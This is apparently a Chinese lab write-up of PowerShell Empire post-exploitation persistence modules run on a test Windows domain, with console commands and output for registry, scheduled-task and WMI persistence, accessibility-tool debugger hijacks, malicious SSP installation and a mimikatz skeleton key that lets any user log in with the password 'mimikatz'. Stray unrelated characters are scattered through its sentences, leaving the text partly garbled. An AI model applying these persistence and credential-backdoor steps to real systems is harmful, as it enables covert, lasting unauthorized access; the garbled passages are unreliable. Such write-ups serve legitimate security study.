這是緊接著上一步

elevated——權限維持

注冊表

(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/registry) > 
Registry persistence established using listener test stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

因為是開機啟動脆淹，所以會彈個黑框

計劃任務schtasks

(Empire: powershell/persistence/elevated/schtasks) > set Listener test
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/schtasks) > 
成功: 成功創(chuàng)建計劃任務 "Updater"常空。
Schtasks persistence established using listener test stored in HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 09:00.

wmi

(Empire: powershell/persistence/elevated/wmi) > set Listener test
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.

查看的方法參考

運行結果

第一個很明顯是注冊表的，后兩者都提權為system權限了

(Empire: FZUB5V31) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  FZUB5V31        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\Administrator powershell/2736     5/0.0    2017-08-18 10:28:13
  E1MPZRLB        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/3624     5/0.0    2017-08-18 10:28:15
  NY76AGRX        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/740      5/0.0    2017-08-18 10:28:14

PowerBreach

deaduser刪除指定賬戶時觸發(fā)執(zhí)行
eventlog定時查看事件日志盖溺，當有指定值如Hack時觸發(fā)漓糙，需要管理員權限執(zhí)行
resolver定時解析域名，當滿足指定ip時觸發(fā)

UserLand

顧名思義用戶登陸時觸發(fā)咐柜。registry schtasks跟前面的重復兼蜈，backdoor_lnk是構造一個特殊的快捷方式。（但是設置C:\test.LNK并沒有發(fā)現(xiàn)生成成功）

Misc

add_sid_history：調用Mimikatz的misc::addsid拙友，結果ERROR mimikatz_doLocal ; "addsid" command of "misc" module not found !
debugger ：給sethc.exe, Utilman.exe, osk.exe, Narrator.exe, or Magnify.exe添加debugger
disable_machine_acct_change: 禁用必須修改密碼的策略

ssp

Security Support Provider为狸，直譯為安全支持提供者，又名Security Package.
簡單的理解為SSP就是一個DLL遗契，用來實現(xiàn)身份認證辐棒，例如：

NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)

SSPI： Security Support Provider Interface，直譯為安全支持提供程序接口，是Windows系統(tǒng)在執(zhí)行認證操作所使用的API漾根。 簡單的理解為SSPI是SSP的API接口
LSA： Local Security Authority鸭你，用于身份認證，常見進程為lsass.exe
特別的地方在于LSA是可擴展的尚猿，在系統(tǒng)啟動的時候SSP會被加載到進程lsass.exe中.
這相當于我們可以自定義一個dll澈蝙，在系統(tǒng)啟動的時候被加載到進程lsass.exe！
get_ssp查看當前的ssp列表寄疏。
install_ssp允許你安裝指定dll是牢。
memssp會記錄所有的認證事件到C:\Windows\System32\mimisla.log.Should be reboot persistent.
實際測試根本就沒有生成那個log文件，操作系統(tǒng)2008 R2 x64陕截。

skeleton_key

(Empire: powershell/persistence/misc/skeleton_key) > 
Job started: C175UZ
Hostname: WIN-EGQU692VVEO.test.com / authority\system-authority\system
  .#####.   mimikatz 2.1 (x64) built on Dec 11 2016 18:05:17
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Skeleton key implanted. Use password 'mimikatz' for access.

親測可用驳棱，任意用戶名加上密碼mimikatz就能登陸。